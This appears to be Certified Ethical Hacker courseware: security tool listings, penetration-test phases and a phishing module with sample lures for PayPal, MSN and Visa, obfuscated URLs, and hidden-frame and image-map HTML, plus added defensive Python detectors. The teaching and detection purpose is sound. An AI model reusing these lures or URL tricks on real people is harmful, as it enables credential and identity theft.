Denial of Service Emulation Tools

© FlameThrower - By www.antara.net

• Generates real-world Internet traffic from a single network appliance, so users can determine overall site capacity and performance and pinpoint weaknesses and potentially fatal bottlenecks.

© Mercury LoadRunner - By http://www.mercury.com

• The Mercury LoadRunner application is the industry-standard performance-testing product for a system's behaviour and performance under load.

© ClearSight Analyzer - By www.spirentcom.com

• ClearSight Analyzer has many features, including an Application Troubleshooting Core that is used to troubleshoot applications with visual representations of the information.
© PORTENT Supreme

• By www.loadtesting.com.

• Portent Supreme is a tool for generating large amounts of HTTP traffic that can be directed at the web server under test.

© WebMux

• By www.redhillnetworks.com/.

• The WebMux load balancer can share the load among a large number of servers, making them appear as one large virtual server.

© SilkPerformer

• By www.segue.com/.

• SilkPerformer enables the user to predict weaknesses in the application and its infrastructure before it is deployed, regardless of its size or complexity.
System Software Assessment Tools

© System Scanner

• By www.iss.net.

• The System Scanner network security application operates as an integrated component of Internet Security Systems' security management platform, assessing host security and monitoring, detecting, and reporting system security weaknesses.

© Internet Scanner

• By www.shavlik.com.

• This utility has a simple, intuitive interface that allows the user to control precisely which groups are going to be scanned, by what policy, when, and how they are installed.

© Database Scanner

• By www.iss.net.

• The database scanner assesses online business risks by identifying security exposures in leading database applications.
Operating System Protection Tools

© Bastille Linux - www.bastille-linux.org

• Bastille Linux is programmed to inform the installing administrator about the security issues concerned in each of the script's hardening tasks.

© EnGarde Secure Linux - www.engardelinux.org

• Provides greater levels of support.

• Supports advanced hardware and a sophisticated upgrade path.
Fingerprinting Tools

© @stake LC 5: www.atstake.com

• @stake LC5 decreases security risk by assisting administrators to identify and fix security holes that are due to the use of weak or easily guessed passwords.

© Foundstone: www.foundstone.com

• Foundstone's fully automated approach to vulnerability remediation enables organizations to easily track and manage the vulnerability fix process.
Port Scanning Tools

© SuperScan

• By www.foundstone.com.

• This utility scans ports at high speed and supports unlimited IP ranges.

© Advanced Port Scanner

• By www.pcflank.com.

• Advanced Port Scanner is a user-friendly port scanner that runs multi-threaded for the best possible performance.

© AW Security Port Scanner

• By www.atelierweb.com.

• Atelier Web Security Port Scanner (AWSPS) is a resourceful network diagnostic toolset that adds a new range of capabilities to the toolkit of network administrators and information security professionals.
Directory and File Access Control Tools

© Abyss Web Server for Windows

• By www.aprelium.com.

• The Abyss Web Server application is a small personal web server that supports HTTP/1.1, CGI scripts, partial downloads, caching negotiation, and file indexing.

© GFI LANguard Portable Storage Control

• By www.gfi.com.

• The GFI LANguard Portable Storage Control tool gives network administrators absolute control over which users can access removable drives, floppy disks, and CD drives on the local machine.

© Windows Security Officer

• By www.bigfoot.com.

• The Windows Security Officer application enables the network administrator to protect and totally control access to all the systems present in the LAN.
File Share Scanning Tools

© Infiltrator Network Security Scanner

• By www.network-security-scan.com/.

• This application is a network security scanner that can be used to audit the network computers for possible vulnerabilities, exploits, and other information enumerations.

© Encrypted FTP 3

• By www.eftp.org.

© GFI LANguard

• www.mestacl/soluciones/gfilan.htm
Password Directories

© Passphrase Keeper 2.60

• By www.passphrasekeeper.com.

• Passphrase Keeper enables the user to safely save and manage all account information such as user names, passwords, PINs, and credit card numbers.

© IISProtect

• By www.iisprotect.com.

• IISProtect performs the function of authenticating the user and safeguarding passwords.
© Webmaster Password Generator

• By www.spychecker.com.

• The Webmaster Password Generator application is a powerful and easy-to-use tool for creating a large list of random passwords.

© Internet Explorer Password Recovery Master

• By www.rixler.com.

• Internet Explorer Password Revealer is a password recovery tool programmed for viewing and clearing the password and form data stored by Internet Explorer.

© Password Recovery Toolbox

• By www.rixler.com.

• Internet Password Recovery Toolbox can recover passwords that fall into any one of these categories: Internet Explorer passwords, network and dial-up passwords, and Outlook Express passwords.
© Alert Link Runner

• By www.alertbookmarks.com.

• Alert Link Runner is an application that checks the validity of hyperlinks on a web page or site, and across an entire enterprise network.

© Link Utility

• By www.net-promoter.com.

• Link Utility is an application with many functions, including checking the links in a site and keeping the site healthy.

© LinxExplorer

• By www.linxexplorer.com.

• LinxExplorer is a link verification tool that enables the user to find and validate websites and HTML pages that have broken links.
Web-testing Based Scripting Tools

© Svoi.NET PHP Edit

• By http://phpedit.svoi.net/eng/main.phedit.

• Svoi.NET PHP Edit is a utility that enables the user to edit, test, and debug PHP scripts and HTML/XML pages.

© OptiPerl

• By www.xarka.com.

• OptiPerl enables the user to create CGI and console scripts in Perl, offline in Windows.

© Blueprint Software Web Scripting Editor

• By www.blueprint-software.net.
© StackGuard

• By www.immunix.org.

• It is a compiler extension that protects programs against stack smashing attacks by placing a canary value next to the saved return address and checking it before the function returns.

© FormatGuard

• By www.immunix.org.

• It is designed to provide a solution to the potentially large number of unknown format string bugs, by checking at run time that the number of arguments passed to a printf-style function matches what the format string consumes.

© RaceGuard

• By www.immunix.org.

• RaceGuard protects against file system race conditions (time-of-check to time-of-use). In a race condition the attacker seeks to exploit the time gap between a privileged program checking for the existence of a file and the program actually writing to that file.
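
An added example (not RaceGuard's own code, and not from the courseware) of the race the RaceGuard bullet describes, reproduced deterministically in Python. `vulnerable_write` checks the path by name and then opens it by name; a constructed `attacker` hook runs in the gap, standing in for a process that wins the race by swapping the checked file for a symlink to a secret. `safe_write` closes the gap in the application itself: it opens once with `O_NOFOLLOW`, then validates the object it actually opened (via `fstat`) rather than the name. It assumes a POSIX system, since `O_NOFOLLOW` and `geteuid` do not exist on Windows.

```python
import os
import stat
import tempfile


def vulnerable_write(path, data, attacker=None):
    """Check-then-use: refuses symlinks at check time, then re-opens by name.

    `attacker` is a constructed hook that runs between the check and the use,
    standing in for a process that wins the race window.
    """
    if os.path.islink(path):
        raise PermissionError("refusing to write through a symlink")
    if attacker:
        attacker()
    with open(path, "w") as f:      # re-resolves the name: follows a symlink planted meanwhile
        f.write(data)


def safe_write(path, data, attacker=None):
    """Open once with O_NOFOLLOW, then validate the opened object, never the name.

    The attacker hook is kept only to show that winning the race no longer helps.
    """
    if attacker:
        attacker()
    fd = os.open(path, os.O_WRONLY | os.O_TRUNC | os.O_NOFOLLOW)  # ELOOP on a symlink
    try:
        st = os.fstat(fd)           # properties of what we hold, not of the path
        if not stat.S_ISREG(st.st_mode):
            raise PermissionError("not a regular file")
        if st.st_nlink != 1:
            raise PermissionError("hard-linked file: may alias something else")
        if st.st_uid != os.geteuid():
            raise PermissionError("file owned by someone else")
    except Exception:
        os.close(fd)
        raise
    with os.fdopen(fd, "w") as f:   # takes ownership of fd and closes it
        f.write(data)


def demo(writer):
    """Constructed scenario: a scratch file and a 'secret' file in a temp directory.

    Returns (secret's content after the write, whether the writer raised).
    """
    with tempfile.TemporaryDirectory() as d:
        secret = os.path.join(d, "secret")
        scratch = os.path.join(d, "scratch")
        with open(secret, "w") as f:
            f.write("original secret")
        with open(scratch, "w") as f:
            f.write("scratch")

        def attacker():             # swaps the checked scratch file for a symlink to the secret
            os.remove(scratch)
            os.symlink(secret, scratch)

        raised = False
        try:
            writer(scratch, "OWNED", attacker)
        except OSError:             # PermissionError and ELOOP are both OSError
            raised = True
        with open(secret) as f:
            return f.read(), raised


if __name__ == "__main__":
    print("vulnerable:", demo(vulnerable_write))   # secret overwritten
    print("safe:      ", demo(safe_write))         # secret intact, write refused
```

For files that are meant to be created rather than updated, the equivalent fix is `O_CREAT | O_EXCL` (or `tempfile.mkstemp`), which fails instead of following anything that appeared in the gap.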
File Encryption Tools

© Maxcrypt

• By www.tucows.com.

• Maxcrypt is an automated computer encryption tool which relieves the user of worrying about the security of the message being sent.

© Secure IT

• By www.cypherix.co.uk/secureit2000/.

• Secure IT is a compression and encryption application that offers 448-bit encryption and has a very high compression rate.

© Steganos

• By http:// .steganos.com/?product=SSS7&language=en.

• The Steganos Internet Trace Destructor application deletes some 150 kinds of work traces, including caches and cookies.
Database Assessment Tools

© EMS MySQL Manager

• By http://ems-hitech.com/mymanager/.

• EMS MySQL Manager provides strong tools for MySQL Database Server administration and for object management. Its Visual Database Manager can design a database within seconds.

© SQL Server Compare

• By http://sql-server-tool.com.

• The SQL Server Comparison Tool is a Windows application used for analyzing, comparing, and documenting SQL Server databases.

© SQL Stripes

• By http://www.sql-server-tool.com/.

• SQL Stripes is a program that helps network administrators keep complete control over their various SQL servers.
Keyboard Logging and Screen Recording Tools

© Spector Professional 5.0

• By www.spectorsoft.com.

• The Spector keylogger has a feature named Smart Rename that renames the keylogger's executable files and registry entries.

© Handy Keylogger

• By http://www.handy-keylogger.com/.

• A stealth keylogger for home and commercial use. The keylogger captures international keyboards, major 2-byte encodings, and character sets.

© Snapshot Spy

• By www.snapshotspy.com.

• It has a deterrent feature which activates a pop-up warning that the system is under surveillance. It is stealthy in nature.
System Event Logging and Reviewing Tools

© LTAuditor+ Version 8.0

• By http://www.bluelance.com.

• Monitors network and user activity around the clock.

© ZVisual RACF

• By www.consul.com.

• ZVisual RACF makes the job of help desk staff and network administrators easy, as they can perform their day-to-day tasks from a Windows workstation.

© Network Intelligence Engine LS Series

• http://www.network-intelligence.com/.

• An event log data warehouse system designed to address the information overload in distributed enterprise and service provider infrastructures.

• It is deployed as a cluster and can manage large networks.
Tripwire and Checksum Tools

© Tripwire for Servers

• By www.tripwire.com.

• Tripwire detects and reports any changes made to system and configuration files by comparing them against a stored baseline of checksums.

© SecurityExpressions

• By www.pedestalsoftware.com.

• A centralized vulnerability management system.

© MD5

• By http://en.wikipedia.org/wiki/Md5.

• MD5 is a cryptographic checksum program that takes a message of arbitrary length as input and generates a 128-bit fingerprint or message digest of the input. MD5 is no longer collision resistant (an attacker who can influence the original file can prepare two files with the same digest), so new integrity baselines should be built with SHA-256 or stronger.
Mobile-code Scanning Tools

© Vital Security

• By www.finjan.com.

• This tool protects users from damaging mobile code received by way of email and the Internet.

© eTrust Secure Content Manager

• By www3.ca.com.

• eTrust Secure Content Manager gives users a built-in, policy-based content security tool that allows the program to fend off attacks ranging from business coercion to network integrity compromises.

© Internet Explorer Zones

• Internet Explorer splits sites into four default zones: the Local intranet zone, the Trusted sites zone, the Restricted sites zone, and the Internet zone.

• Administrators are given the power to configure and manage the risk from mobile code separately for each zone.
Centralized Security Monitoring Tools

© ASAP eSMART Software Usage

• By www.asapsoftware.com.

• This tool helps identify all the software installed across the organization, and also helps to detect unused applications and eliminate them.

© WatchGuard VPN Manager

• By www.watchguard.com.

• System administrators of large organizations can monitor and manage their WatchGuard devices centrally using WatchGuard VPN Manager.

© Harvester

• By http://farm9.org/harvester.

• Security checks and event logs.
© Azure Web Log

• By www.azuredesktop.com.

• The tool generates reports for hourly hits, monthly hits, monthly site traffic, the operating systems and browsers used by visitors to view the website, and error requests.

© AWStats

• By awstats.sourceforge.net/.

• AWStats is a powerful tool with many features that gives a graphical representation of web, FTP, or mail server statistics.

© Summary

• By http://www.summary.net.

• It has more than 200 types of reports which help the user get exactly the information he wants about the website.
Forensic Data and Collection Tools

© EnCase

• By http://www.guidancesoftware.com.

• It can monitor networks in real time without disrupting operations.

© SafeBack

• By http://www.forensic-intl.com.

• Mostly used to back up files and critical data.

• Creates a bit-for-bit mirror image of the entire hard drive, much as a photographic negative is made.

© ILook Investigator

• By http://www.ilook-forensics.org.

• It supports Linux platforms. It has password and passphrase dictionary generators.
Security Assessment Tools

© Nessus Windows Technology

• By www.nessus.org.

• Nessus Windows Technology (NeWT) is a stand-alone vulnerability scanner.

© NetIQ Security Manager

• By www.netiq.com.

• NetIQ Security Manager is an incident management tool that monitors the network in real time, automatically responds to threats, and provides safekeeping of important event information from a central console.

© STAT Scanner

• By www.stat.harris.com.

• STAT Scanner scans the network for vulnerabilities and updates the system administrator with information regarding updates and patches.
Multiple OS Management Tools

© Multiple Boot Manager

• By www.elmchan.org.

• Multiple Boot Manager (MBM) is a low-level system tool which helps to select any OS to boot from a menu.

© Acronis OS Selector

• By www.acronis.com.

• Acronis OS Selector v5 is a boot and partition manager, which allows the user to install more than 100 operating systems.

© Eon

• By http://www.neoware.com.

• Eon 4000 is based on Linux and runs Windows, Unix, X Window, Internet, Java, and mainframe applications.
Phases of Penetration Testing

Pre-attack Phase

[Figure: Pre-Attack Phase, consisting of Passive Reconnaissance and Active Reconnaissance]
© It is vital to maintain a log of all the activities carried
out and the results obtained, or to note the absence of results.

© Ensure that all work is time stamped and
communicated to the concerned person within the
organization if it is so agreed upon in the rules of
engagement.

© While planning an attack strategy, make sure that you
are able to reason out your strategic choices from the input
or output obtained from the pre-attack phase.

© Look at your log and start either developing the tools
you need or acquiring them based on need. This will
help reduce the attack area that might be inadvertently
passed over.
Results That Can Be Expected

© This phase can include information
retrieval such as:

• Physical and logical location of the
organization.

• Analog connections.

• Any contact information.

• Information about other organizations.

• Any other information that has the potential to
result in a possible exploitation.
Passive Reconnaissance

[Figure: Passive Reconnaissance activities: Directory Mapping, Competitive Intelligence Gathering, Asset Classification, Retrieving Registration Information, Product/Service Offering, Document Sifting, Social Engineering]
Passive Reconnaissance

© Activities involve:

- Mapping the directory structure of the web servers
and FTP servers

- Gathering competitive intelligence

- Determining the worth of infrastructure that is
interfacing with the web

- Retrieving network registration information

- Determining the product range and service offerings
of the target company that are available online or can be
requested online

- Document sifting, which refers to gathering information
solely from published material

- Social engineering

EC-Council

Copyright © by EC-Council
All Rights reserved. Reproduction is strictly prohibited

Active Reconnaissance

© Some of the activities involved are:

• Network mapping

• Perimeter mapping

• System and service identification

- Through port scans

• Web profiling

- This phase will attempt to profile and map the
internet profile of the organization
Attack Phase

[Figure: Attack Phase: Penetrate Perimeter, Acquire Target, Escalate Privileges, Execute, Implant, Retract]
Activity: Perimeter Testing

© Testing methods for perimeter security include but are
not limited to:

• Evaluating error reporting and error management with ICMP
probes.

• Checking access control lists by forging responses with crafted
packets.

• Measuring the threshold for denial of service by attempting
persistent TCP connections, evaluating transitory TCP
connections, and attempting streaming UDP connections.

• Evaluating protocol filtering rules by attempting connections
using various protocols such as SSH, FTP, and Telnet.

• Evaluating the IDS capability by passing malicious content (such
as malformed URLs) and scanning the target variously for
response to abnormal traffic.

• Examining the perimeter security system's response to web server
scans using multiple methods such as POST, DELETE, and
COPY.
Activity: Web Application Testing - I

© Testing methods for web application testing include but
are not limited to:

• Input Validation: Tests include OS command injection, script
injection, SQL injection, LDAP injection, and cross-site
scripting.

• Output Sanitization: Tests include parsing special characters
and verifying error checking in the application.

• Checking for Buffer Overflows: Tests include attacks against
stack overflows, heap overflows, and format string overflows.

• Access Control: Check for access to administrative interfaces,
sending data to manipulate form fields, attempting URL query
strings, changing values in the client-side script, and attacking
cookies.

• Denial of Service: Test for DoS induced by malformed user
input, user lockout, and application lockout due to traffic
overload, transaction requests, or excessive requests on the
application.
Activity: Web Application Testing - II

© Component checking: Check for security controls on web
server/application components that might expose the web application to
vulnerabilities.

© Data and Error Checking: Check for data-related security lapses such as
storage of sensitive data in the cache or passing sensitive data through
HTML.

© Confidentiality Check: For applications using secure protocols and
encryption, check for lapses in the key exchange mechanism, for adequate key
length, and for weak algorithms.

© Session Management: Check the time validity of session tokens, length of
tokens, expiration of session tokens while transiting from SSL to non-SSL
resources, presence of any session tokens in the browser history or cache,
and randomness of the session ID (check for use of user data in generating the
ID).

© Configuration Verification: Attempt manipulation of resources using
HTTP methods such as DELETE and PUT, check for version content
availability and any visible restricted source code in public domains,
attempt directory and file listing, test for known vulnerabilities, and check
accessibility of administrative interfaces in the server and server components.
Activity: Wireless Testing

© Testing methods for wireless testing include but are not
limited to:

• Check if the access point's default Service Set Identifier (SSID)
is easily available. Test for "broadcast SSID" and accessibility to
the LAN through this. Tests can include brute forcing the SSID
character string using tools like Kismet.

• Check for vulnerabilities in accessing the WLAN through the
wireless router, access point, or gateway. This can include
verifying if the default Wired Equivalent Privacy (WEP)
encryption key can be captured and decrypted.

• Audit for the broadcast beacon of any access point and check all
protocols available on the access points. Check if layer 2
switched networks are being used instead of hubs for access
point connectivity.

• Subject authentication to playback of previous authentications
in order to check for privilege escalation and unauthorized
access.

• Verify that access is granted only to client machines with
registered MAC addresses.
Activity: Acquiring Target

© We refer to acquiring a target as the set of activities
undertaken where the tester subjects the suspect
machine to more intrusive challenges such as
vulnerability scans and security assessment.

© Testing methods for acquiring a target include but are not
limited to:

• Active probing assaults: This can use the results of network scans
to gather further information that can lead to a compromise.

• Running vulnerability scans: Vulnerability scans are completed
in this phase.

• Trusted systems and trusted process assessment: Attempting to
access the machine's resources using legitimate information
obtained through social engineering or other means.
© Once the target has been acquired, the tester attempts
to exploit the system and gain greater access to
protected resources.

© Activities include (but are not limited to):

• The tester may take advantage of poor security policies and
take advantage of emails or unsafe web code to gather
information that can lead to escalation of privileges.

• Use of techniques such as brute force to achieve privileged
status. Examples of tools include getadmin and password
crackers.

• Use of trojans and protocol analyzers.

• Use of information gleaned through techniques such as social
engineering to gain unauthorized access to privileged
resources.
Activity: Execute, Implant, and
Retract

© In this phase, the tester effectively compromises
the acquired system by executing arbitrary
code.

© The objective here is to explore the extent to
which security fails.

© Executing exploits already available or specially
crafted to take advantage of the vulnerabilities
identified in the target system.
Post Attack Phase and Activities

© This phase is critical to any penetration test as it is the
responsibility of the tester to restore the systems to the
pre-test state.

© Post attack phase activities include some of the
following:

• Removing all files uploaded on the system.

• Cleaning all registry entries and removing vulnerabilities
created.

• Removing all tools and exploits from the tested
systems.

• Restoring the network to the pre-test state by
removing shares and connections.

• Analyzing all results and presenting the same to the
organization.
Penetration Testing Deliverables
Templates

© A pentest report will carry details of the
incidents that have occurred during the testing
process and the range of activities carried out
by the testing team.

© Broad areas covered include objectives,
observations, activities undertaken, and
incidents reported.

© The team may also recommend corrective
actions based on the rules of engagement.
CEH
Certified Ethical Hacker

Phishing Attacks
and
Identity Theft

Additional Module

Note: This module is not in
your courseware

What is Phishing?

© A form of identity theft in which a scammer
uses an authentic-looking e-mail to trick
recipients into giving out sensitive personal
information, such as a credit card, bank account
or Social Security number

© Phishing attacks use social engineering to
steal consumers' personal identity data and
financial account credentials

© (adapted from "fishing for information")
Attacks

© It is the most common corporate identity theft
scam today - Phishing

© It usually involves an e-mail message asking
consumers to update their personal information
with a link to a spoofed Web site

© To give their schemes a legitimate look and feel,
fraudsters commonly steal well-known
corporate identities, product names and logos

© It is very easy to construct authentic-looking websites
for e-mail scams
Phishing Reports

[Chart: Phishing Reports Received October '04 - October '05. Source: Anti-Phishing Working Group]
Phishing Example (PayPal)

Dear PayPal,
[Annotation: the strange greeting]

We recently noticed one or more attempts to log in to your PayPal account
from a foreign IP address.

If you recently accessed your account while traveling, the unusual log in
attempts may have been initiated by you. However, if you did not initiate
the log ins, please visit PayPal as soon as possible to verify your
identity:

https://www.paypal.com/us/cgi-bin/webscr?cmd=_login-run

Verify your identity is a security measure that will ensure that you are
the only person with access to the account.

Thanks for your patience as we work together to protect your account.

Sincerely,
PayPal

NEVER give your password to anyone and ONLY log in at
https://www.paypal.com/. Protect yourself against fraudulent websites by
opening a new web browser (e.g. Internet Explorer or Netscape) and typing
in the PayPal URL every time you log in to your account.

Please do not reply to this e-mail. Mail sent to this address cannot be
answered. For assistance, log in to your PayPal account and choose the
"Help" link in the header of any page.

PayPal Email ID PP321VIYJEXEnOKBHFXKFNXZDBBTOMZKWEJEGYYHOL
[Annotation: disguised random text]

PROTECT YOUR PASSWORD
Phishing Example (PayPal)

[Screenshot: spoofed "PayPal - Log In" page in Microsoft Internet Explorer. The spoofed address bar shows https://www.paypal.com/cgi-bin/webscr?cmd=_login-run and the page carries the Member Log In form (Email Address, Password). Notice the discrepancy: no lock icon in the status bar.]
Phishing Example (MSN)

Darling Msn user.

During one of our regular automated verification procedures we've encountered
a some problem caused by the fact that we could not verify the info that you provided to us.
Please, give us the following information so that we could fully verify your identity.
Otherwise your access to MSN services will be closed.

To verify your information please http://www.msnassistance.com/index.php follow this link.

Thanks for using MSN.
MSN Web Access Supporting.
Phishing Example (MSN)

[Screenshot: a pop-up window titled "Verify Your Account Information - Microsoft Internet Explorer" opened in front of the real MSN site (http://www.msn.com/) in the background.]
Phishing Example (Visa)

VISA - Verified by Visa

Dear Visa® customer,

Before activating your card, read this important information for cardholders!

You have been sent this invitation because the records of Visa Corporate indicate you are a current or former Visa card holder. To
ensure your Visa card's security, it is important that you protect your Visa card online with a personal password. Please take a
moment, and activate for Verified by Visa now.

Verified by Visa protects your existing Visa card with a password you create, giving you assurance that only you can use your Visa card
online.

Simply activate your card and create your personal password. You'll get the added confidence that your Visa card is safe when you
shop at participating online stores.

Activate Now for Verified by Visa

Thank you for your support.
Visa Service Department
Phishing Example (Visa)

[Screenshot: "Visa USA | Personal | Verified by Visa - Microsoft Internet Explorer". The forged address bar shows https://usa.visa.com/personal/security/vbv/index.html, and the page asks for the Visa Card Number, Expiration Date, Card Verification Value and ATM PIN. The Properties dialog reveals the real URL: Protocol: HyperText Transfer Protocol; Connection: Not Encrypted; Address: http://200.251.251.10/.verified/. There is no secure session (lock) icon.]
Hidden Frames

© Frames are a popular method of hiding attack
content

© They have uniform browser support and an easy
coding style

© The attacker defines HTML code using two
frames

© The first frame contains the legitimate site URL
information, while the second frame, occupying
0% of the browser interface, has malicious
code running
Hidden Frames Example

<html>
<head>
<title>Frame Based Exploit Example</title>
</head>

<body topmargin="0" leftmargin="0" rightmargin="0"
bottommargin="0">

<iframe src="http://www.yahoo.com" width="100%"
height="150" frameborder="0"></iframe>
<iframe src="http://www.msn.com" width="100%"
height="350" frameborder="0"></iframe>
</body>

</html>

Download the phishing hacking tools at

http://www.eccouncil.org/cehtools/phishing.zip
Hidden Frames Example

© In the example, MSN is displayed in a second frame within the
master frame showing Yahoo

[Screenshot: browser window showing Yahoo in the top frame and MSN in the frame below it]
URL obfuscation

© Using Strings - Uses a credible-sounding text string within the URL

• Example:

http://xx.xx.78.45/ebay/account_update/now.asp

© Using @ sign - This kind of syntax is normally used for websites that require some
authentication. The left side of the @ sign is ignored and the domain name or IP
address on the right side of the @ sign is treated as the legitimate domain (@ can be
replaced with its URL-encoded form %40)

• Example:

http://www.citybank.com/update.asp@xx.xx.66.78/usb/process.asp

© Status Bar Tricks - The URL is so long that it cannot be completely displayed in
the status bar - Often combined with the @ so that the fraudulent URL is at the end
and not displayed

• Example

http://www.visa.com:UserSession=2f6q9uuu88312264trzzz55884495&usersoption=SecurityUpdate&StateLevel=GetFrom@61.252.126.191/verified_by_visa.html
URL obfuscation

© Similar Name Tricks - These kinds of tricks
use a credible-sounding, but fraudulent, domain
name

© Examples:

• http://www.ebay-support.com/verify

• http://www.citybank-secure.com/login

• http://www.suntrustbank.com

• http://www.amex-corp.com

• http://www.fedex-security.com
URL Encoding Techniques

© URLs are encoded to disguise their true value using hex, dword, or
octal encoding

© Sometimes @ is used in the disguise

© Sometimes the @ sign is replaced with %40

© Example:

http://www.paypal.com@%32%32%30%2E%36%38%2E%32%31%34%2E%32%31%33

• which translates into 220.68.214.213

© http://www.paypal.com%40570754567

• which translates into 34.5.6.7
IP Address to Base 10 Formula

© To convert 66.46.55.116 to base 10 the
formula is:

© 66 x 256^3 + 46 x 256^2 + 55 x 256^1 + 116 = 1110325108

© After conversion, test it by pinging 1110325108
in a command prompt

© Exercise: Convert your classroom gateway IP address to base 10
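The following Python script, added here as an example and not courseware code, applies the rules from the last three slides to recover the real host of an obfuscated URL: it strips the ignored text before @ (including its %40 form), percent-decodes the host, converts dword, hex and octal hosts back to dotted decimal, and implements the base-10 formula above in both directions. It follows the URL standard in treating only an @ inside the authority (before the first /) as the userinfo delimiter; the sample URLs are the ones quoted on the slides, with their xx placeholder octets left as-is, and STATUS_BAR_LIMIT is an assumed display width.

```python
"""Recover the real destination of an obfuscated URL (added example, not
courseware code). The sample URLs are the ones quoted on the slides."""
import re
from urllib.parse import unquote, urlsplit

# One dotted-quad part: hex (0x..), octal (leading 0) or decimal.
OCTET = r"0[xX][0-9a-fA-F]+|0[0-7]*|[1-9][0-9]*"
STATUS_BAR_LIMIT = 80  # assumed width beyond which the status bar truncates


def ip_to_base10(dotted: str) -> int:
    """The slide formula: a*256^3 + b*256^2 + c*256 + d."""
    a, b, c, d = (int(x) for x in dotted.split("."))
    return a * 256 ** 3 + b * 256 ** 2 + c * 256 + d


def base10_to_ip(value: int) -> str:
    """Inverse of ip_to_base10: split a 32-bit dword into four octets."""
    if not 0 <= value <= 0xFFFFFFFF:
        raise ValueError("not a 32-bit address")
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def _octet(token: str) -> int:
    """Parse one octet written in hex (0x..), octal (leading 0) or decimal."""
    if token[:2].lower() == "0x":
        return int(token, 16)
    if len(token) > 1 and token[0] == "0":
        return int(token, 8)
    return int(token)


def normalize_host(host: str) -> str:
    """Turn percent-encoded, dword, hex or octal hosts into dotted decimal."""
    host = unquote(host)  # %32%32%30%2E... becomes 220. ...
    if re.fullmatch(r"[0-9]+", host):             # single decimal dword
        return base10_to_ip(int(host))
    if re.fullmatch(r"0[xX][0-9a-fA-F]+", host):   # single hex dword
        return base10_to_ip(int(host, 16))
    parts = host.split(".")
    if len(parts) == 4 and all(re.fullmatch(OCTET, p) for p in parts):
        octets = [_octet(p) for p in parts]
        if max(octets) <= 255:
            return ".".join(str(o) for o in octets)
    return host.lower()  # names, or placeholders such as xx.xx.66.78


def analyze_url(url: str) -> dict:
    """Report the obfuscation tricks a URL uses and the host it really reaches."""
    findings = []
    parts = urlsplit(url)
    # Undo the %40 disguise only inside the authority, where @ has meaning.
    netloc = re.sub("%40", "@", parts.netloc, flags=re.IGNORECASE)
    if netloc != parts.netloc:
        findings.append("@ disguised as %40")
    userinfo, at, hostport = netloc.rpartition("@")
    if at:
        findings.append(f"text before @ is ignored: {userinfo}")
    raw_host = hostport.split(":")[0]
    host = normalize_host(raw_host)
    if host != raw_host.lower():
        findings.append(f"encoded host {raw_host} is really {host}")
    if len(url) > STATUS_BAR_LIMIT:
        findings.append("too long for the status bar; the end may be hidden")
    return {"host": host, "path": parts.path, "findings": findings}


if __name__ == "__main__":
    for sample in (
        "http://www.paypal.com@%32%32%30%2E%36%38%2E%32%31%34%2E%32%31%33",
        "http://www.paypal.com%40570754567",
        "http://www.visa.com:UserSession=2f6q9uuu88312264trzzz55884495"
        "&usersoption=SecurityUpdate&StateLevel=GetFrom@61.252.126.191"
        "/verified_by_visa.html",
    ):
        print(analyze_url(sample))
    print(ip_to_base10("66.46.55.116"))  # 1110325108, as on the slide
```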
HTML Image Mapping Techniques

© The URL is actually a part of an image, which uses map
coordinates to define the click area and the real URL, with
the fake URL from the <A> tag being displayed

© Example:

<html>
<head>
<title>CEH Demo</title>
</head>

<body>

<img src="file:///C:/SOMEIMAGE.jpg" width="440" height="356"
border="0" usemap="#Map">
<map name="Map">
<area shape="rect" coords="146,50,300,84"
href="http://certifiedhacker.com">
</map></body>
</html>
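An added Python example, not courseware code, that scans page markup for the two tricks described in the Hidden Frames and HTML Image Mapping slides: iframes that embed a foreign site or are hidden outright, and image-map areas whose click target is not the site the page claims to be. The HTML samples are the slides' two examples re-typed, and the trusted host is an assumed parameter supplied by the caller.

```python
"""Flag hidden or foreign iframes and image-map click targets (added example,
not courseware code). The samples are the slides' HTML re-typed."""
from html.parser import HTMLParser
from urllib.parse import urlsplit

# The slides' two examples, re-typed as constructed input.
FRAME_SAMPLE = """<html><head><title>Frame Based Exploit Example</title></head>
<body topmargin="0" leftmargin="0" rightmargin="0" bottommargin="0">
<iframe src="http://www.yahoo.com" width="100%" height="150" frameborder="0"></iframe>
<iframe src="http://www.msn.com" width="100%" height="350" frameborder="0"></iframe>
</body></html>"""

IMAGEMAP_SAMPLE = """<html><head><title>CEH Demo</title></head><body>
<img src="file:///C:/SOMEIMAGE.jpg" width="440" height="356" border="0" usemap="#Map">
<map name="Map">
<area shape="rect" coords="146,50,300,84" href="http://certifiedhacker.com">
</map></body></html>"""


class PhishMarkupInspector(HTMLParser):
    """Collects findings while the parser walks the start tags."""

    def __init__(self, trusted_host: str):
        super().__init__()
        self.trusted_host = trusted_host.lower()  # assumed: the site the page claims to be
        self.findings = []

    def _foreign_host(self, url: str) -> str:
        """Host of url when it differs from the trusted host, else ''."""
        host = urlsplit(url).netloc.rpartition("@")[2].split(":")[0].lower()
        return host if host and host != self.trusted_host else ""

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}  # attribute values may be None
        if tag == "iframe":
            height = a.get("height", "").strip().rstrip("%")
            style = a.get("style", "").replace(" ", "").lower()
            # The slide's "0% of the browser interface" frame, or a CSS-hidden one.
            if (height.isdigit() and int(height) == 0) or "display:none" in style:
                self.findings.append(f"hidden iframe loads {a.get('src', '')}")
            foreign = self._foreign_host(a.get("src", ""))
            if foreign:
                self.findings.append(f"iframe embeds foreign site {foreign}")
        elif tag == "area":
            # The real destination lives in the map area, not in what is displayed.
            foreign = self._foreign_host(a.get("href", ""))
            if foreign:
                self.findings.append(f"image-map click goes to {foreign}")


def inspect_markup(html: str, trusted_host: str) -> list:
    """Return the findings for a page that claims to belong to trusted_host."""
    inspector = PhishMarkupInspector(trusted_host)
    inspector.feed(html)
    inspector.close()
    return inspector.findings


if __name__ == "__main__":
    print(inspect_markup(FRAME_SAMPLE, "www.yahoo.com"))
    print(inspect_markup(IMAGEMAP_SAMPLE, "www.citibank.com"))
```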
Fake Browser Address Bars

[Screenshot: a Comodo VerificationEngine ("Vengine") web page in Microsoft Internet Explorer whose window title reads "Fake Address Bar". The page content draws its own address bar inside the page; annotation: "This is fake address bar".]

Download the phishing hacking tools at
http://www.eccouncil.org/cehtools/phishing.zip
Fake Toolbars

[Screenshot: the same Comodo VerificationEngine page, window title "Fake Address Bar - Microsoft Internet Explorer". The page draws a fake toolbar whose Address field reads http://www.nike.com/main.html; annotation: "This is fake toolbar".]

Download the phishing hacking tools at
http://www.eccouncil.org/cehtools/phishing.zip
Fake Status Bar

